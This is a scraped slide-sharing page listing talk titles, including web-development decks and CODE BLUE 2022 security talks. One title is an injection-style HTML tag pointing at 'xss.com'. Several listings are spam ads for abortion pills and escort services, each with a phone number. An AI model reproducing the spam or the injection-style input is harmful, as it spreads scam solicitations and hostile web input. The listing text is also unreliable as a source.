JavaScript For People Who Don't Code
JavaScript For People Who Don't CodeJavaScript For People Who Don't Code
JavaScript For People Who Don't Code
Ā 
Webpack packing it all
Webpack packing it allWebpack packing it all
Webpack packing it all
Ā 
Packing it all: JavaScript module bundling from 2000 to now
Packing it all: JavaScript module bundling from 2000 to nowPacking it all: JavaScript module bundling from 2000 to now
Packing it all: JavaScript module bundling from 2000 to now
Ā 
XSLT for Web Developers
XSLT for Web DevelopersXSLT for Web Developers
XSLT for Web Developers
Ā 
Spine.js
Spine.jsSpine.js
Spine.js
Ā 
Web performance essentials - Goodies
Web performance essentials - GoodiesWeb performance essentials - Goodies
Web performance essentials - Goodies
Ā 
How Xslate Works
How Xslate WorksHow Xslate Works
How Xslate Works
Ā 
&lt;img src="xss.com">
&lt;img src="xss.com">&lt;img src="xss.com">
&lt;img src="xss.com">
Ā 
Fav
FavFav
Fav
Ā 
Introduction to java script
Introduction to java scriptIntroduction to java script
Introduction to java script
Ā 
Wt unit 2 ppts client sied technology
Wt unit 2 ppts client sied technologyWt unit 2 ppts client sied technology
Wt unit 2 ppts client sied technology
Ā 
Wt unit 2 ppts client side technology
Wt unit 2 ppts client side technologyWt unit 2 ppts client side technology
Wt unit 2 ppts client side technology
Ā 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & Defense
Ā 
Enhance Web Performance
Enhance Web PerformanceEnhance Web Performance
Enhance Web Performance
Ā 
Hppg
HppgHppg
Hppg
Ā 
Artem Storozhuk "Building SQL firewall: insights from developers"
Artem Storozhuk "Building SQL firewall: insights from developers"Artem Storozhuk "Building SQL firewall: insights from developers"
Artem Storozhuk "Building SQL firewall: insights from developers"
Ā 
Slides
SlidesSlides
Slides
Ā 
xhtml_basics
xhtml_basicsxhtml_basics
xhtml_basics
Ā 
Xhtml Basics
Xhtml BasicsXhtml Basics
Xhtml Basics
Ā 

More from CODE BLUE

[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...CODE BLUE
Ā 
[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten NohlCODE BLUE
Ā 
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...CODE BLUE
Ā 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
Ā 
[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ4ļ¼‰ by ęæę©‹ 博之
[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ4ļ¼‰ by ęæę©‹ 博之[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ4ļ¼‰ by ęæę©‹ 博之
[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ4ļ¼‰ by ęæę©‹ 博之CODE BLUE
Ā 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
Ā 
[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ3ļ¼‰ by Lorenzo Pupillo
[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ3ļ¼‰ by Lorenzo Pupillo[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ3ļ¼‰ by Lorenzo Pupillo
[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ3ļ¼‰ by Lorenzo PupilloCODE BLUE
Ā 
[cb22] ā€The Present and Future of Coordinated Vulnerability Disclosureā€ Inte...
[cb22]  ā€The Present and Future of Coordinated Vulnerability Disclosureā€ Inte...[cb22]  ā€The Present and Future of Coordinated Vulnerability Disclosureā€ Inte...
[cb22] ā€The Present and Future of Coordinated Vulnerability Disclosureā€ Inte...CODE BLUE
Ā 
[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ2ļ¼‰by Allan Friedman
[cb22]  ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ2ļ¼‰by Allan Friedman [cb22]  ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ2ļ¼‰by Allan Friedman
[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ2ļ¼‰by Allan Friedman CODE BLUE
Ā 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
Ā 
[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ ļ¼ˆ1ļ¼‰by é«˜ę©‹ 郁夫
[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ ļ¼ˆ1ļ¼‰by  é«˜ę©‹ 郁夫[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ ļ¼ˆ1ļ¼‰by  é«˜ę©‹ 郁夫
[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ ļ¼ˆ1ļ¼‰by é«˜ę©‹ 郁夫CODE BLUE
Ā 
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...CODE BLUE
Ā 
[cb22] Wslinkć®ćƒžćƒ«ćƒćƒ¬ć‚¤ćƒ¤ćƒ¼ćŖä»®ęƒ³ē’°å¢ƒć«ć¤ć„恦 by Vladislav Hrčka
[cb22] Wslinkć®ćƒžćƒ«ćƒćƒ¬ć‚¤ćƒ¤ćƒ¼ćŖä»®ęƒ³ē’°å¢ƒć«ć¤ć„恦 by Vladislav Hrčka [cb22] Wslinkć®ćƒžćƒ«ćƒćƒ¬ć‚¤ćƒ¤ćƒ¼ćŖä»®ęƒ³ē’°å¢ƒć«ć¤ć„恦 by Vladislav Hrčka
[cb22] Wslinkć®ćƒžćƒ«ćƒćƒ¬ć‚¤ćƒ¤ćƒ¼ćŖä»®ęƒ³ē’°å¢ƒć«ć¤ć„恦 by Vladislav Hrčka CODE BLUE
Ā 
[cb22] Under the hood of Wslinkā€™s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslinkā€™s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslinkā€™s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslinkā€™s multilayered virtual machine en by Vladisla...CODE BLUE
Ā 
[cb22] CloudDragonā€™s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragonā€™s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragonā€™s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragonā€™s Credential Factory is Powering Up Its Espionage Activiti...CODE BLUE
Ā 
[cb22] From Parroting to Echoing: The Evolution of Chinaā€™s Bots-Driven Info...
[cb22]  From Parroting to Echoing:  The Evolution of Chinaā€™s Bots-Driven Info...[cb22]  From Parroting to Echoing:  The Evolution of Chinaā€™s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of Chinaā€™s Bots-Driven Info...CODE BLUE
Ā 
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of ā€œgimpfuzzyā€...
[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of ā€œgimpfuzzyā€...[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of ā€œgimpfuzzyā€...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of ā€œgimpfuzzyā€...CODE BLUE
Ā 
[cb22] Mal-gopherćØćÆļ¼ŸGoē³»ćƒžćƒ«ć‚¦ć‚§ć‚¢ć®åˆ†é”žć®ćŸć‚ć®gimpfuzzyå®Ÿč£…ćØč©•ä¾” by ę¾¤éƒØ ē„å¤Ŗ, ē”˜ē²• ä¼øå¹ø, 野ꝑ 和也
[cb22] Mal-gopherćØćÆļ¼ŸGoē³»ćƒžćƒ«ć‚¦ć‚§ć‚¢ć®åˆ†é”žć®ćŸć‚ć®gimpfuzzyå®Ÿč£…ćØč©•ä¾” by ę¾¤éƒØ ē„å¤Ŗ, ē”˜ē²• ä¼øå¹ø, 野ꝑ 和也[cb22] Mal-gopherćØćÆļ¼ŸGoē³»ćƒžćƒ«ć‚¦ć‚§ć‚¢ć®åˆ†é”žć®ćŸć‚ć®gimpfuzzyå®Ÿč£…ćØč©•ä¾” by ę¾¤éƒØ ē„å¤Ŗ, ē”˜ē²• ä¼øå¹ø, 野ꝑ 和也
[cb22] Mal-gopherćØćÆļ¼ŸGoē³»ćƒžćƒ«ć‚¦ć‚§ć‚¢ć®åˆ†é”žć®ćŸć‚ć®gimpfuzzyå®Ÿč£…ćØč©•ä¾” by ę¾¤éƒØ ē„å¤Ŗ, ē”˜ē²• ä¼øå¹ø, 野ꝑ 和也CODE BLUE
Ā 
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...CODE BLUE
Ā 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...CODE BLUE
Ā 

More from CODE BLUE (20)

[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
Ā 
[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl
Ā 
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
Ā 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
Ā 
[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ4ļ¼‰ by ęæę©‹ 博之
[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ4ļ¼‰ by ęæę©‹ 博之[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ4ļ¼‰ by ęæę©‹ 博之
[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ4ļ¼‰ by ęæę©‹ 博之
Ā 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
Ā 
[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ3ļ¼‰ by Lorenzo Pupillo
[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ3ļ¼‰ by Lorenzo Pupillo[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ3ļ¼‰ by Lorenzo Pupillo
[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ3ļ¼‰ by Lorenzo Pupillo
Ā 
[cb22] ā€The Present and Future of Coordinated Vulnerability Disclosureā€ Inte...
[cb22]  ā€The Present and Future of Coordinated Vulnerability Disclosureā€ Inte...[cb22]  ā€The Present and Future of Coordinated Vulnerability Disclosureā€ Inte...
[cb22] ā€The Present and Future of Coordinated Vulnerability Disclosureā€ Inte...
Ā 
[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ2ļ¼‰by Allan Friedman
[cb22]  ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ2ļ¼‰by Allan Friedman [cb22]  ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ2ļ¼‰by Allan Friedman
[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ļ¼ˆ2ļ¼‰by Allan Friedman
Ā 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
Ā 
[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ ļ¼ˆ1ļ¼‰by é«˜ę©‹ 郁夫
[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ ļ¼ˆ1ļ¼‰by  é«˜ę©‹ 郁夫[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ ļ¼ˆ1ļ¼‰by  é«˜ę©‹ 郁夫
[cb22] ć€Œå”čŖæć•ć‚ŒćŸč„†å¼±ę€§é–‹ē¤ŗ恮ē¾åœØćØęœŖę„ć€å›½éš›ēš„ćŖćƒ‘ćƒćƒ«ćƒ‡ć‚£ć‚¹ć‚«ćƒƒć‚·ćƒ§ćƒ³ ļ¼ˆ1ļ¼‰by é«˜ę©‹ 郁夫
Ā 
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
Ā 
[cb22] Wslinkć®ćƒžćƒ«ćƒćƒ¬ć‚¤ćƒ¤ćƒ¼ćŖä»®ęƒ³ē’°å¢ƒć«ć¤ć„恦 by Vladislav Hrčka
[cb22] Wslinkć®ćƒžćƒ«ćƒćƒ¬ć‚¤ćƒ¤ćƒ¼ćŖä»®ęƒ³ē’°å¢ƒć«ć¤ć„恦 by Vladislav Hrčka [cb22] Wslinkć®ćƒžćƒ«ćƒćƒ¬ć‚¤ćƒ¤ćƒ¼ćŖä»®ęƒ³ē’°å¢ƒć«ć¤ć„恦 by Vladislav Hrčka
[cb22] Wslinkć®ćƒžćƒ«ćƒćƒ¬ć‚¤ćƒ¤ćƒ¼ćŖä»®ęƒ³ē’°å¢ƒć«ć¤ć„恦 by Vladislav Hrčka
Ā 
[cb22] Under the hood of Wslinkā€™s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslinkā€™s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslinkā€™s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslinkā€™s multilayered virtual machine en by Vladisla...
Ā 
[cb22] CloudDragonā€™s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragonā€™s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragonā€™s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragonā€™s Credential Factory is Powering Up Its Espionage Activiti...
Ā 
[cb22] From Parroting to Echoing: The Evolution of Chinaā€™s Bots-Driven Info...
[cb22]  From Parroting to Echoing:  The Evolution of Chinaā€™s Bots-Driven Info...[cb22]  From Parroting to Echoing:  The Evolution of Chinaā€™s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of Chinaā€™s Bots-Driven Info...
Ā 
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of ā€œgimpfuzzyā€...
[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of ā€œgimpfuzzyā€...[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of ā€œgimpfuzzyā€...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of ā€œgimpfuzzyā€...
Ā 
[cb22] Mal-gopherćØćÆļ¼ŸGoē³»ćƒžćƒ«ć‚¦ć‚§ć‚¢ć®åˆ†é”žć®ćŸć‚ć®gimpfuzzyå®Ÿč£…ćØč©•ä¾” by ę¾¤éƒØ ē„å¤Ŗ, ē”˜ē²• ä¼øå¹ø, 野ꝑ 和也
[cb22] Mal-gopherćØćÆļ¼ŸGoē³»ćƒžćƒ«ć‚¦ć‚§ć‚¢ć®åˆ†é”žć®ćŸć‚ć®gimpfuzzyå®Ÿč£…ćØč©•ä¾” by ę¾¤éƒØ ē„å¤Ŗ, ē”˜ē²• ä¼øå¹ø, 野ꝑ 和也[cb22] Mal-gopherćØćÆļ¼ŸGoē³»ćƒžćƒ«ć‚¦ć‚§ć‚¢ć®åˆ†é”žć®ćŸć‚ć®gimpfuzzyå®Ÿč£…ćØč©•ä¾” by ę¾¤éƒØ ē„å¤Ŗ, ē”˜ē²• ä¼øå¹ø, 野ꝑ 和也
[cb22] Mal-gopherćØćÆļ¼ŸGoē³»ćƒžćƒ«ć‚¦ć‚§ć‚¢ć®åˆ†é”žć®ćŸć‚ć®gimpfuzzyå®Ÿč£…ćØč©•ä¾” by ę¾¤éƒØ ē„å¤Ŗ, ē”˜ē²• ä¼øå¹ø, 野ꝑ 和也
Ā 
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
Ā 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
Ā 

Recently uploaded

The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...kalichargn70th171
Ā 
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfonteinmasabamasaba
Ā 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrandmasabamasaba
Ā 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesVictorSzoltysek
Ā 
BUS PASS MANGEMENT SYSTEM USING PHP.pptx
BUS PASS MANGEMENT SYSTEM USING PHP.pptxBUS PASS MANGEMENT SYSTEM USING PHP.pptx
BUS PASS MANGEMENT SYSTEM USING PHP.pptxalwaysnagaraju26
Ā 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisamasabamasaba
Ā 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems -The Print[A] Example- A Comprehension AidDirect Style Effect Systems -The Print[A] Example- A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidPhilip Schwarz
Ā 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsArshad QA
Ā 
CHEAP Call Girls in Pushp Vihar (-DELHI )šŸ” 9953056974šŸ”(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )šŸ” 9953056974šŸ”(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )šŸ” 9953056974šŸ”(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )šŸ” 9953056974šŸ”(=)/CALL GIRLS SERVICE9953056974 Low Rate Call Girls In Saket, Delhi NCR
Ā 
Define the academic and professional writing..pdf
Define the academic and professional writing..pdfDefine the academic and professional writing..pdf
Define the academic and professional writing..pdfPearlKirahMaeRagusta1
Ā 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnAmarnathKambale
Ā 
10 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 202410 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 2024Mind IT Systems
Ā 
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park %in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park masabamasaba
Ā 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
